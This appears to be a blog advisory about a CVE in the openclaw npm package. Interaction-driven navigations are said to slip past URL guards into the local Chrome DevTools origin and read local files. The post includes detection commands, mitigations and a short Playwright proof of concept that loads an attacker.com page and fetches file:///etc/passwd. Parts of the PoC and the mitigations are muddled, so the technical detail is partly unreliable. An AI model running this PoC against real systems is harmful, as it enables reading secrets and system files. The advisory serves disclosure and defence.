Listen to this Post
How the mentioned CVE works:
The vulnerability exists in openclaw versions below 2026.4.9.
It allows browser interaction routes (e.g., act/evaluate calls) to pivot into the local Chrome DevTools Protocol (CDP) origin.
Normally, direct navigation to file:// pages is blocked by navigation guards.
However, interaction-driven navigations—such as clicking a link or submitting a form—bypass these guards.
An attacker can craft a malicious page or script that triggers a navigation after a user interaction.
This navigation targets the local CDP endpoint, which has elevated privileges.
From the CDP origin, the attacker can then create or read disallowed file:// resources.
This leads to unauthorized file reads from the local filesystem.
The root cause is that the browser URL policy is not rechecked after interaction-driven navigations.
Specifically, after an action like element.click() or evaluate() that changes the page URL, the old policy still applies.
The local CDP origin (e.g., chrome-devtools://devtools/) is treated as trusted.
An attacker can use that trust to escape the same-origin policy and access file:// URIs.
The attack chain: victim visits attacker-controlled page → interaction triggers navigation to CDP → CDP page loads → JavaScript from CDP reads local files.
This works even if direct file:// navigation is blocked because the CDP origin is whitelisted.
The vulnerability is a bypass of the configured navigation policy.
It requires that the browser instance has CDP enabled (common in headless automation).
No additional privileges are needed beyond the ability to run browser interactions.
The impact is information disclosure of local files.
The fix re-checks browser URLs after each interaction-driven navigation.
If the new target violates the policy (e.g., file://), the navigation is blocked.
dailycve form:
Platform: npm package
Version: <2026.4.9
Vulnerability: CDP file-read
Severity: Medium
date: 2026-04-09
Prediction: 2026-04-14
What Undercode Say:
Analytics:
Count vulnerable openclaw installations
npm list openclaw | grep -c "@2026.4" || echo "Check versions"
Monitor interaction-driven navigation attempts
grep -r "page.evaluate|element.click" ./automation-scripts/
Log all CDP origins in browser logs
jq 'select(.url | contains("chrome-devtools://"))' browser-profile.log
Exploit:
// PoC: Pivot to local CDP and read /etc/passwd
const { chromium } = require('playwright'); // or puppeteer
(async () => {
const browser = await chromium.launch();
const page = await browser.newPage();
// Victim visits attacker page
await page.goto('https://attacker.com/exploit.html');
// Interaction triggers navigation to CDP
await page.click('trigger');
// After navigation, CDP origin allows file read
await page.evaluate(async () => {
const res = await fetch('file:///etc/passwd');
console.log(await res.text());
});
})();
Protection from this CVE:
- Upgrade to openclaw >=2026.4.9 or 2026.4.14
- Apply patch commit 5f5b3d733bdd791cb457f838514179e1288b10b3
- Disable local CDP in production: `–remote-debugging-port=0`
– Enforce strict navigation policy: `page.route(‘file://’, route => route.abort())`
– Use sandboxed browser instances with `–no-sandbox` disabled
Impact:
Unauthorized local file reads (e.g., configs, secrets, /etc/passwd).
Bypasses same-origin policy and navigation guards.
Leads to information disclosure in automated browsing environments.
No remote code execution, but sensitive data exposure.
CVSS: 5.3 (Medium) – requires user interaction and CDP enabled.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

